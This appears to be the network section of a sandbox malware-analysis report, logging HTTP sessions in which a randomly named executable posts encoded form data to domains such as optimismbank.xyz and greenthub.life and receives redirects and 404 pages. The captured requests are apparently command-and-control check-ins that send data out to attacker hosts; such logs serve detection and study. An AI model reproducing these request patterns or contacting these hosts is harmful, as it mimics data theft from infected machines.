                                                                                                                  Data Raw: 62 56 3d 75 71 64 43 4b 2b 4f 2f 34 4b 6d 51 5a 74 78 75 65 35 57 6d 69 48 55 59 31 75 53 2b 47 31 6f 4a 62 6f 35 2f 54 32 4f 5a 46 2f 7a 48 58 6c 63 4b 41 64 45 52 49 6a 50 4a 75 62 46 61 65 4e 6e 64 30 59 79 64 34 57 79 76 48 62 4f 42 62 59 64 79 64 66 4c 45 50 49 62 6b 54 4b 4e 52 4f 54 6f 76 75 59 68 75 4a 41 49 75 31 5a 30 59 48 37 67 42 58 63 43 42 42 4f 61 49 34 67 6b 32 47 62 34 76 48 33 6c 36 51 46 4d 67 41 62 66 43 58 55 6e 45 5a 31 35 51 74 39 6b 51 6e 2b 48 70 6f 42 77 4d 70 48 77 59 46 66 44 30 32 6d 6e 4b 51 33 72 76 32 57 6a 47 77 59 45 68 52 43 38 31 30 4a 69 4a 4a 30 51 72 48 58 4d 3d
                                                                                                                  Data Ascii: bV=uqdCK+O/4KmQZtxue5WmiHUY1uS+G1oJbo5/T2OZF/zHXlcKAdERIjPJubFaeNnd0Yyd4WyvHbOBbYdydfLEPIbkTKNROTovuYhuJAIu1Z0YH7gBXcCBBOaI4gk2Gb4vH3l6QFMgAbfCXUnEZ15Qt9kQn+HpoBwMpHwYFfD02mnKQ3rv2WjGwYEhRC810JiJJ0QrHXM=


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  2192.168.2.54979713.248.169.4880728C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 2, 2024 15:23:58.367033005 CET791OUTPOST /98j3/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 223
                                                                                                                  Connection: close
                                                                                                                  Host: www.optimismbank.xyz
                                                                                                                  Origin: http://www.optimismbank.xyz
                                                                                                                  Referer: http://www.optimismbank.xyz/98j3/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                  Data Raw: 62 56 3d 75 71 64 43 4b 2b 4f 2f 34 4b 6d 51 59 4e 42 75 5a 72 2b 6d 7a 6e 55 62 70 2b 53 2b 4a 56 6f 4e 62 6f 39 2f 54 7a 72 43 46 4a 6a 48 58 45 73 4b 48 5a 51 52 4c 6a 50 4a 6d 37 46 62 42 64 6e 53 30 59 50 69 34 58 2b 76 48 62 61 42 62 61 46 79 42 34 2f 48 50 59 62 6d 4b 61 4e 45 4b 54 6f 76 75 59 68 75 4a 41 64 31 31 64 51 59 48 4c 51 42 56 34 57 43 49 75 61 4c 78 41 6b 32 4d 4c 34 72 48 33 6c 59 51 42 4e 39 41 5a 6e 43 58 55 58 45 5a 41 5a 54 34 4e 6b 73 36 4f 47 56 6f 78 64 6f 6b 57 59 57 41 4e 61 43 6e 32 66 6b 59 68 61 46 73 30 72 75 6a 34 6f 5a 42 52 30 43 6c 35 44 67 54 58 41 62 5a 41 59 5a 49 7a 57 52 56 79 74 48 42 61 4e 63 4f 65 4a 67 68 39 77 64
                                                                                                                  Data Ascii: bV=uqdCK+O/4KmQYNBuZr+mznUbp+S+JVoNbo9/TzrCFJjHXEsKHZQRLjPJm7FbBdnS0YPi4X+vHbaBbaFyB4/HPYbmKaNEKTovuYhuJAd11dQYHLQBV4WCIuaLxAk2ML4rH3lYQBN9AZnCXUXEZAZT4Nks6OGVoxdokWYWANaCn2fkYhaFs0ruj4oZBR0Cl5DgTXAbZAYZIzWRVytHBaNcOeJgh9wd


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  3192.168.2.54980413.248.169.4880728C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 2, 2024 15:24:01.235642910 CET1808OUTPOST /98j3/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 1239
                                                                                                                  Connection: close
                                                                                                                  Host: www.optimismbank.xyz
                                                                                                                  Origin: http://www.optimismbank.xyz
                                                                                                                  Referer: http://www.optimismbank.xyz/98j3/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                  Data Raw: 62 56 3d 75 71 64 43 4b 2b 4f 2f 34 4b 6d 51 59 4e 42 75 5a 72 2b 6d 7a 6e 55 62 70 2b 53 2b 4a 56 6f 4e 62 6f 39 2f 54 7a 72 43 46 4a 72 48 58 32 6b 4b 48 34 51 52 4b 6a 50 4a 6c 37 46 57 42 64 6e 50 30 59 57 72 34 58 44 4e 48 59 69 42 5a 35 4e 79 52 4e 54 48 45 59 62 6d 58 4b 4e 51 4f 54 70 31 75 59 78 71 4a 41 4e 31 31 64 51 59 48 49 59 42 52 73 43 43 45 4f 61 49 34 67 6b 41 47 62 34 58 48 33 39 69 51 42 41 4b 41 4a 48 43 58 77 7a 45 4b 6a 78 54 6b 64 6b 55 35 4f 47 4e 6f 78 52 33 6b 57 55 30 41 4d 2b 6f 6e 31 50 6b 4f 47 4c 41 39 6b 62 6e 36 4a 67 4f 47 52 38 55 36 59 6a 64 53 31 45 77 61 78 41 47 4b 48 62 36 57 47 59 41 44 5a 67 50 4d 66 56 58 73 4a 6c 37 32 6d 59 77 34 78 6e 68 49 72 73 42 47 32 59 53 46 2f 46 69 76 49 53 6d 33 4d 58 45 48 75 70 2b 68 42 79 41 61 31 4c 43 45 6f 69 5a 2b 33 38 68 47 6a 6e 32 30 5a 4e 33 55 70 66 4b 72 43 6d 49 6e 36 36 4e 50 38 56 79 45 52 4c 39 35 6d 74 6c 61 58 73 4c 44 53 71 35 45 6d 69 38 67 32 45 79 43 37 6e 38 56 68 62 78 53 68 4c 30 64 48 55 7a 44 37 41 [TRUNCATED]
                                                                                                                  Data Ascii: bV=uqdCK+O/4KmQYNBuZr+mznUbp+S+JVoNbo9/TzrCFJrHX2kKH4QRKjPJl7FWBdnP0YWr4XDNHYiBZ5NyRNTHEYbmXKNQOTp1uYxqJAN11dQYHIYBRsCCEOaI4gkAGb4XH39iQBAKAJHCXwzEKjxTkdkU5OGNoxR3kWU0AM+on1PkOGLA9kbn6JgOGR8U6YjdS1EwaxAGKHb6WGYADZgPMfVXsJl72mYw4xnhIrsBG2YSF/FivISm3MXEHup+hByAa1LCEoiZ+38hGjn20ZN3UpfKrCmIn66NP8VyERL95mtlaXsLDSq5Emi8g2EyC7n8VhbxShL0dHUzD7AoHuDaF0Hx1QdlR7dmAEQczTH28AldxcPKgyhUeM1iB/Wa0ulSqF8/6haeiiLIm1Kqdzr1aq7EV5HVesQMvzyAOop9Wu9/3ccr8tyHYZ7wtnWozL8btCeApCQ7jVro9xbnJ8kmNXWyaACCj6yiq3tKeOSLubn8kHOEvjfjhjvCTt2R1Grw5AnWSZilj9O3AA+j00eIlg3bPflE4/TY5kvoUPUNPWcty1Iz4u0l/8ln5AFc24m1rLxZ4yNnt4u0o/p42IkwB/OeGU17flmWnAqgNq4V4hpMI8zlOVC5GbiUG5JsIuK4VCIyMCUOVZI66KsSNEX0YuiR8Eltr5RVJ7RdoewjWpqnWsj2qZZcKylaNFOKGtNr6NPrWBFUDEmuDby1g3QV15Ieosv5joioB0yo4dLGVLsDWWwav2aVCHO2Apx+xnh6XTlBA1Yj/reRVMWIljDR8oq6728J78trjnKlNjvCTvsBtc03oihlbaBCCkV71oXVm++pHeioF1jjnsYLIJfn4zZ7xK7Dbes+CG6HsEliUOgPQVYfw05A4EDI1x3UuGQiY7WWIm6loiRSQRJSLG9wNG4yKSipSnmTQHQH92fLtbTZY9UQoqh7dRAARRJ+zpVyBygJBEtb5ZYKh5D3/0ud5gcALP5sA1RGf1Hr+p07a+y0UfTgN [TRUNCATED]


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  4192.168.2.54980913.248.169.4880728C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 2, 2024 15:24:03.972923994 CET501OUTGET /98j3/?bV=jo1iJOnj8ueGZPJABf2g0H8HuOKbJgV1DdtSaCSQL5v3UEYBE5VATgrqgu9yCYXU1qT81UG2HbOLQLBbZNDoMbelSKgrKC4QuJZGFDN8wI4iJ7kAaJbEHf+I5C8wBrJZeg==&wzcP=iLdd HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Connection: close
                                                                                                                  Host: www.optimismbank.xyz
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                  Dec 2, 2024 15:24:05.071458101 CET400INHTTP/1.1 200 OK
                                                                                                                  Server: openresty
                                                                                                                  Date: Mon, 02 Dec 2024 14:24:04 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 260
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 62 56 3d 6a 6f 31 69 4a 4f 6e 6a 38 75 65 47 5a 50 4a 41 42 66 32 67 30 48 38 48 75 4f 4b 62 4a 67 56 31 44 64 74 53 61 43 53 51 4c 35 76 33 55 45 59 42 45 35 56 41 54 67 72 71 67 75 39 79 43 59 58 55 31 71 54 38 31 55 47 32 48 62 4f 4c 51 4c 42 62 5a 4e 44 6f 4d 62 65 6c 53 4b 67 72 4b 43 34 51 75 4a 5a 47 46 44 4e 38 77 49 34 69 4a 37 6b 41 61 4a 62 45 48 66 2b 49 35 43 38 77 42 72 4a 5a 65 67 3d 3d 26 77 7a 63 50 3d 69 4c 64 64 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?bV=jo1iJOnj8ueGZPJABf2g0H8HuOKbJgV1DdtSaCSQL5v3UEYBE5VATgrqgu9yCYXU1qT81UG2HbOLQLBbZNDoMbelSKgrKC4QuJZGFDN8wI4iJ7kAaJbEHf+I5C8wBrJZeg==&wzcP=iLdd"}</script></head></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  5192.168.2.549825209.74.77.10980728C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 2, 2024 15:24:10.680368900 CET765OUTPOST /r3zg/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 203
                                                                                                                  Connection: close
                                                                                                                  Host: www.greenthub.life
                                                                                                                  Origin: http://www.greenthub.life
                                                                                                                  Referer: http://www.greenthub.life/r3zg/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                  Data Raw: 62 56 3d 51 73 51 44 4e 37 4f 32 6d 76 6a 59 6e 6e 6a 4a 45 2f 79 42 66 74 61 34 77 30 36 48 34 47 72 78 65 6b 6a 6e 4a 4a 72 54 65 79 6a 46 36 48 4b 6e 73 79 4d 32 71 7a 76 70 61 76 32 6d 4d 4e 39 78 38 78 36 66 46 6e 42 54 52 59 58 61 59 51 69 65 48 4d 4f 69 2f 35 6f 38 76 4d 35 78 73 6a 43 76 41 4e 56 78 76 65 64 53 77 33 46 38 43 32 4c 62 6b 6d 6f 5a 36 63 33 63 2b 71 35 6b 44 6e 68 55 37 64 44 64 5a 63 47 67 59 6e 6c 44 43 45 58 44 72 6d 4b 37 44 68 62 73 5a 6b 77 64 36 39 43 79 51 71 73 4d 37 4d 56 61 70 39 36 4a 65 4d 43 6f 37 55 51 47 4a 30 37 72 31 2b 6c 42 57 74 4e 59 48 6d 6e 62 34 42 6f 3d
                                                                                                                  Data Ascii: bV=QsQDN7O2mvjYnnjJE/yBfta4w06H4GrxekjnJJrTeyjF6HKnsyM2qzvpav2mMN9x8x6fFnBTRYXaYQieHMOi/5o8vM5xsjCvANVxvedSw3F8C2LbkmoZ6c3c+q5kDnhU7dDdZcGgYnlDCEXDrmK7DhbsZkwd69CyQqsM7MVap96JeMCo7UQGJ07r1+lBWtNYHmnb4Bo=
                                                                                                                  Dec 2, 2024 15:24:11.910187960 CET533INHTTP/1.1 404 Not Found
                                                                                                                  Date: Mon, 02 Dec 2024 14:24:11 GMT
                                                                                                                  Server: Apache
                                                                                                                  Content-Length: 389
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html
                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  6192.168.2.549832209.74.77.10980728C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 2, 2024 15:24:13.418637037 CET785OUTPOST /r3zg/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 223
                                                                                                                  Connection: close
                                                                                                                  Host: www.greenthub.life
                                                                                                                  Origin: http://www.greenthub.life
                                                                                                                  Referer: http://www.greenthub.life/r3zg/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                  Data Raw: 62 56 3d 51 73 51 44 4e 37 4f 32 6d 76 6a 59 6d 47 54 4a 43 59 6d 42 64 4e 61 33 70 55 36 48 33 6d 72 39 65 6c 66 6e 4a 4e 37 44 65 41 48 46 36 6a 61 6e 74 7a 4d 32 6d 54 76 70 52 50 32 6a 52 64 39 2b 38 78 33 38 46 69 68 54 52 59 44 61 59 51 79 65 48 37 69 6a 2b 70 6f 69 6b 73 35 6b 79 54 43 76 41 4e 56 78 76 65 4a 6f 77 30 31 38 44 48 37 62 6c 44 46 72 6b 73 33 66 6f 36 35 6b 4f 48 68 51 37 64 44 6a 5a 65 6a 4e 59 68 70 44 43 47 66 44 72 58 4b 34 5a 78 62 71 64 6b 78 50 32 49 76 57 49 62 41 2f 37 66 78 54 38 63 36 64 53 61 7a 43 68 32 59 75 61 55 58 54 6c 74 74 32 48 64 73 78 64 46 33 72 6d 57 39 2f 46 38 69 61 66 50 63 72 44 4b 51 64 5a 49 68 76 61 54 46 52
                                                                                                                  Data Ascii: bV=QsQDN7O2mvjYmGTJCYmBdNa3pU6H3mr9elfnJN7DeAHF6jantzM2mTvpRP2jRd9+8x38FihTRYDaYQyeH7ij+poiks5kyTCvANVxveJow018DH7blDFrks3fo65kOHhQ7dDjZejNYhpDCGfDrXK4ZxbqdkxP2IvWIbA/7fxT8c6dSazCh2YuaUXTltt2HdsxdF3rmW9/F8iafPcrDKQdZIhvaTFR
                                                                                                                  Dec 2, 2024 15:24:14.605081081 CET533INHTTP/1.1 404 Not Found
                                                                                                                  Date: Mon, 02 Dec 2024 14:24:14 GMT
                                                                                                                  Server: Apache
                                                                                                                  Content-Length: 389
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html
                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  7192.168.2.549839209.74.77.10980728C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 2, 2024 15:24:16.083868027 CET1802OUTPOST /r3zg/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 1239
                                                                                                                  Connection: close
                                                                                                                  Host: www.greenthub.life
                                                                                                                  Origin: http://www.greenthub.life
                                                                                                                  Referer: http://www.greenthub.life/r3zg/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                  Data Raw: 62 56 3d 51 73 51 44 4e 37 4f 32 6d 76 6a 59 6d 47 54 4a 43 59 6d 42 64 4e 61 33 70 55 36 48 33 6d 72 39 65 6c 66 6e 4a 4e 37 44 65 41 50 46 37 52 53 6e 73 51 30 32 6f 7a 76 70 53 50 32 69 52 64 39 5a 38 78 76 67 46 69 6c 70 52 61 37 61 5a 7a 4b 65 42 50 32 6a 33 70 6f 69 72 4d 35 77 73 6a 43 41 41 4e 6c 31 76 65 5a 6f 77 30 31 38 44 45 54 62 68 57 70 72 6d 73 33 63 2b 71 35 34 44 6e 68 6f 37 64 4c 73 5a 65 6e 37 59 78 4a 44 48 57 50 44 70 46 69 34 53 78 62 6f 61 6b 77 4b 32 49 72 4a 49 62 64 47 37 65 45 4f 38 62 4f 64 52 2b 57 41 31 33 77 54 48 31 6a 30 77 38 6c 34 56 4a 6f 44 64 55 6e 6d 75 6c 4a 41 49 39 69 51 49 6f 6b 71 49 6f 46 54 46 38 42 69 4b 56 77 76 6c 4b 56 4a 6c 4b 45 6e 45 47 64 61 4c 43 53 6a 74 39 62 52 68 31 62 47 4d 41 79 74 50 47 42 4f 54 76 4d 67 4a 71 59 6c 2f 54 32 32 32 49 52 4c 6f 42 4c 62 2f 69 55 59 6b 39 34 34 43 73 36 7a 4b 74 6a 54 36 66 6d 74 31 2f 61 38 58 6e 44 65 30 6f 37 54 50 4b 69 72 64 6a 6a 70 64 67 67 73 55 5a 6b 51 4e 77 75 47 79 57 43 78 36 71 66 57 74 7a 5a [TRUNCATED]
                                                                                                                  Data Ascii: bV=QsQDN7O2mvjYmGTJCYmBdNa3pU6H3mr9elfnJN7DeAPF7RSnsQ02ozvpSP2iRd9Z8xvgFilpRa7aZzKeBP2j3poirM5wsjCAANl1veZow018DETbhWprms3c+q54Dnho7dLsZen7YxJDHWPDpFi4SxboakwK2IrJIbdG7eEO8bOdR+WA13wTH1j0w8l4VJoDdUnmulJAI9iQIokqIoFTF8BiKVwvlKVJlKEnEGdaLCSjt9bRh1bGMAytPGBOTvMgJqYl/T222IRLoBLb/iUYk944Cs6zKtjT6fmt1/a8XnDe0o7TPKirdjjpdggsUZkQNwuGyWCx6qfWtzZrbqmVqHA+GqkYxg/N/A6eFTG1zBPlagQkGzYtNl1pkikHHNkmO+VYF3KHFuDjB/hlI/xawGzZc0LLpT5Z6btoAialjh3ArMw2a2tbHen7OYOzWzNawztPrYXaFya6bezgQDKjTaYz+vYQAHSmq2r1EWdoJv8ZJ3mghS9XCQeiHkDDHlXYyaHpbMVBH0phe97qVnc9N8c9Y8M1mlkL2ZLv9dQuZahFy+yzZUDj+u/J1cF54NvKDGRiMmtRYGMgALmDSzDv3x6rzgmLXcM57OKr0BYb7hmfTjoDtjOg6QlgohzZ1d2FVO8SL3QPbVYncqBeXdYTDovg9x2ahv34Yze2cqei/ji8lbrAJax9Uztq4TpGd87h8eiEJj9OlAT2gigBTN4FJQn3dY8bJxu2HrdDBJuMBXFeEAfCyUSFFlit536HDbBOI2p9iUH12hlv/dPfkkokZlBF4BJ01lRcdlf9KCZRjkmvW6c4xQMiCaG17hKcKv6BBeVqw9GK7D3FwtcEyA1yLVfpQaI+WdejiwtjcN9CSFYcTwNOLcTrndTZE7InUu0XcsLD/O8+ws1Brt/u6qJfZfOjgKAJbtwuDHFrc1k/3hE0s0cQVxTc+xgmKXYmyY1JutPI2gWoNCimk3A287sDrFNaQ0eKgcTG5hYxOTWGbpAFoVz/L [TRUNCATED]
                                                                                                                  Dec 2, 2024 15:24:17.348841906 CET533INHTTP/1.1 404 Not Found
                                                                                                                  Date: Mon, 02 Dec 2024 14:24:17 GMT
                                                                                                                  Server: Apache
                                                                                                                  Content-Length: 389
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html
                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  8192.168.2.549846209.74.77.10980728C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 2, 2024 15:24:18.745285034 CET499OUTGET /r3zg/?bV=du4jOMLkh7fLnmDuLYOIPa2Wp2ys3F+jaV3EKcXkS3D/yxi6pio40SibWtKrR6Fw1AeDGXhTcKeneAqCGOT06b5FqqYL9BGdKsZ2rM8t/H5MOkDBuj8Escbc06JqN3wYtw==&wzcP=iLdd HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Connection: close
                                                                                                                  Host: www.greenthub.life
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
